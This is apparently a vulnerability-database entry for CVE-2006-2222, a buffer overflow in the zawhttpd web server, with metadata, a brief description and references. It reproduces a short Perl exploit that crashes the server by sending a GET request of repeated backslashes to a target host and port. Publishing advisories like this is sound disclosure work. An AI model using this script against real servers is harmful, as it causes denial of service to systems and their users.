zawhttpd HTTP GET 缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110212 漏洞类型 缓冲区溢出
发布时间 2006-05-04 更新时间 2006-05-08
CVE编号 CVE-2006-2222 CNNVD-ID CNNVD-200605-103
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/1746
https://cxsecurity.com/issue/WLB-2006050049
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-103
|漏洞详情
zawhttpd是一款小型的Web服务器程序。zawhttpd在处理用户请求时存在漏洞,远程攻击者可以发送特制的HTTPGET请求触发缓冲区溢出,导致zawhttpd进程崩溃。
|漏洞EXP
#!/usr/bin/perl
# zawhttpd Buffer Overflow Exploit
# by Kamil 'K3' Sienicki

use IO::Socket;
use strict;

my($socket) = "";

if($socket = IO::Socket::INET->new(
                PeerAddr => $ARGV[0],
                PeerPort => $ARGV[1],
                Proto => "TCP"))
{
        print "Attempting to kill zawhttpd at $ARGV[0]:$ARGV[1] ...";
        print $socket "GET \\\\\\\\\\\\\\\\\\\\ HTTP/1.0\r\n\r\n";
        close($socket);
}
else
{
        print "perl zawhttpd.pl localhost 80 \n";
        print "Cannot connect to $ARGV[0]:$ARGV[1]\n";
}
#EoF 

# milw0rm.com [2006-05-04]
|参考资料

来源:BID
名称:17814
链接:http://www.securityfocus.com/bid/17814
来源:BUGTRAQ
名称:20060502zawhttpd-BufferOverflow
链接:http://www.securityfocus.com/archive/1/archive/1/432955/100/0/threaded
来源:XF
名称:zawhttpd-get-dos(26257)
链接:http://xforce.iss.net/xforce/xfdb/26257
来源:MISC
链接:http://www.securiteam.com/exploits/5OP0315IKK.html
来源:OSVDB
名称:25671
链接:http://www.osvdb.org/25671
来源:SECTRACK
名称:1016030
链接:http://securitytracker.com/id?1016030
来源:SREASON
名称:852
链接:http://securityreason.com/securityalert/852